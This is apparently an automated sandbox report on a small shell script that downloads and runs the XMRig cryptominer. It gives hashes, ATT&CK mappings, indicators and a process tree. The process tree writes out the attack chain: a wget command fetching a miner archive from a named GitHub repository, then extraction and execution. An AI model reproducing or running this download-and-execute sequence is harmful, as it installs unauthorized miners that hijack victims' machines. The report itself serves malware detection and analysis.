xmrig | 62d6004452cfd60bd2b6c5395081c77cc84e7fa63eefb203daa1652cda475b8c

General

Target

runnb.sh
Size

160B
MD5

87ea8773efcca67a4f2ce3e1ba1d1ff8
SHA1

0770e97785f007f7a3bc9d7e35a72b16895c366d
SHA256

765a3183613b556d32d8775fc21410c61d1565a372c27ed54193d4808b5cdb01
SHA512

df69c7a84df081850f4a1f72d78f65ddf61074fd4af7f989458cdc4273b5a64eeccb6864391ca780875e7b754834bbcbb17d550c4c9514101a8d3f45470ac514

Score

10^/10

xmrig antivm discovery miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
/tmp/xmrig-6.22.0/xmrig	family_xmrig
/tmp/xmrig-6.22.0/xmrig	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Executes dropped EXE 1 IoCs

Processes:

xmrig

ioc pid process

/tmp/xmrig-6.22.0/xmrig 1587 xmrig

ioc	pid	process
/tmp/xmrig-6.22.0/xmrig	1587	xmrig

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

xmrig

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	xmrig

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

5 raw.githubusercontent.com
6 raw.githubusercontent.com
7 raw.githubusercontent.com

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

discovery

System Information Discovery

T1082

Processes:

xmrig

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	xmrig

Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

xmrig

description ioc process

File opened for reading /proc/cpuinfo xmrig

description	ioc	process
File opened for reading	/proc/cpuinfo	xmrig

Reads CPU attributes 1 TTPs 45 IoCs

discovery

System Information Discovery

T1082

Processes:

xmrig

description	ioc	process
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	xmrig
File opened for reading	/sys/devices/system/cpu/online	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	xmrig
File opened for reading	/sys/devices/system/cpu/possible	xmrig

Enumerates kernel/hardware configuration 1 TTPs 27 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

xmrig

description	ioc	process
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/virtual/dmi/id	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	xmrig
File opened for reading	/sys/bus/dax/devices	xmrig
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	xmrig
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	xmrig
File opened for reading	/sys/devices/system/node/node0/cpumap	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/cpu_atom/cpus	xmrig
File opened for reading	/sys/devices/system/node/online	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	xmrig
File opened for reading	/sys/fs/cgroup/cgroup.controllers	xmrig
File opened for reading	/sys/kernel/mm/hugepages	xmrig
File opened for reading	/sys/bus/soc/devices	xmrig
File opened for reading	/sys/devices/cpu_core/cpus	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	xmrig
File opened for reading	/sys/firmware/dmi/tables/DMI	xmrig
File opened for reading	/sys/devices/system/cpu	xmrig
File opened for reading	/sys/devices/system/node/node0/meminfo	xmrig
File opened for reading	/sys/devices/system/node/node0/access1/initiators	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	xmrig

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

xmrigtar

description	ioc	process
File opened for reading	/proc/version_signature	xmrig
File opened for reading	/proc/sys/vm/nr_hugepages	xmrig
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/cmdline	xmrig
File opened for reading	/proc/mounts	xmrig
File opened for reading	/proc/self/cpuset	xmrig
File opened for reading	/proc/meminfo	xmrig
File opened for reading	/proc/driver/nvidia/gpus	xmrig

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgettarxmrig

description	ioc	process
File opened for modification	/tmp/xmrigtar.tar.gz	wget
File opened for modification	/tmp/xmrig-6.22.0/SHA256SUMS	tar
File opened for modification	/tmp/xmrig-6.22.0/config.json	tar
File opened for modification	/tmp/xmrig-6.22.0/xmrig	tar
File opened for modification	/tmp/xmrig-6.22.0/config.json	xmrig

/tmp/runnb.sh
/tmp/runnb.sh
1⤵
PID:1572

/usr/bin/wget
wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
2⤵
- Writes file to tmp directory
PID:1573

/usr/bin/tar
tar xvf xmrigtar.tar.gz
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1578

/usr/local/sbin/gzip
gzip -d
3⤵
PID:1584

/usr/local/bin/gzip
gzip -d
3⤵
PID:1584

/usr/sbin/gzip
gzip -d
3⤵
PID:1584

/usr/bin/gzip
gzip -d
3⤵
PID:1584

/usr/bin/chmod
2⤵
PID:1586

/tmp/xmrig-6.22.0/xmrig
2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1587

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

2

T1497

System Checks

2

T1497.001

Credential Access

Discovery

System Information Discovery

3

T1082

Virtualization/Sandbox Evasion

2

T1497

System Checks

2

T1497.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/.wget-hsts

Filesize
215B

MD5
afb5928f4ccf51581f8ba150e814812c

SHA1
b8c3fbab40f191f1e161ffdade3ac0f5c66a25bd

SHA256
eebbdbafbbe840fbb62e1b79d555dbb6d9f558013aba6385924ca48697e00ecb

SHA512
f9567d8ce892a46585da43191b3820248b87f39ed21541797abccfe977d884e906d6da48f16459b7a69a0435e58ba18827715a7d33c3dd9d0f182965bd8de2b6

Download Submit
/tmp/xmrig-6.22.0/SHA256SUMS

Filesize
150B

MD5
19f1bb08cf8997837b1f738b76ca97e9

SHA1
c497499ad539d6ef580c6c932a2633fe820abded

SHA256
99ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa

SHA512
fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230

Download Submit
/tmp/xmrig-6.22.0/config.json

Filesize
919B

MD5
0a9b0011891eae4086d16c3364e772ff

SHA1
98fe8a7b5b6b0c0aa7635e4e388c67c863772b69

SHA256
1aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd

SHA512
9e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554

Download Submit
/tmp/xmrig-6.22.0/config.json

Filesize
1KB

MD5
1879742a3f028a8e227f3b6b51756269

SHA1
20365c0cf35e787f525baede3646cfdfe6001cba

SHA256
4042908287a7c60eb515d2c180a03d25156b4001af6cba1ad823461cc86751c5

SHA512
e7d918532dd029a53b803df0df2e4e61416e18b58ffabe18b542cd30b111f266e98d73aad8ffe62a79af50e4f21d7e19415ee03ff104eb36aaad2cf1903e9731

Download Submit
/tmp/xmrig-6.22.0/xmrig

Filesize
7.7MB

MD5
466d426a411add606457183e2b648960

SHA1
2b7d2dda0fccc79542d50251ef6b307b43a0131c

SHA256
e5617635d8a9497560a41fbeea5bde8d585bb2a619d4901b4f1f31bd3455076f

SHA512
9eb3dbad333615665fd7c70b8fd3cb012039faeadbf42f8d757e68dd26820611630c1a2a8c283fbd74b9d11ce57337030965e4d63f0d44c3d2ac4c3e1468bd59

Download Submit
/tmp/xmrigtar.tar.gz

Filesize
3.4MB

MD5
ccdb2d76041e107dff38f962d65b3d4b

SHA1
e9360c43398f3725b0a3eb87e2448ac416d96be3

SHA256
11d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f

SHA512
f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads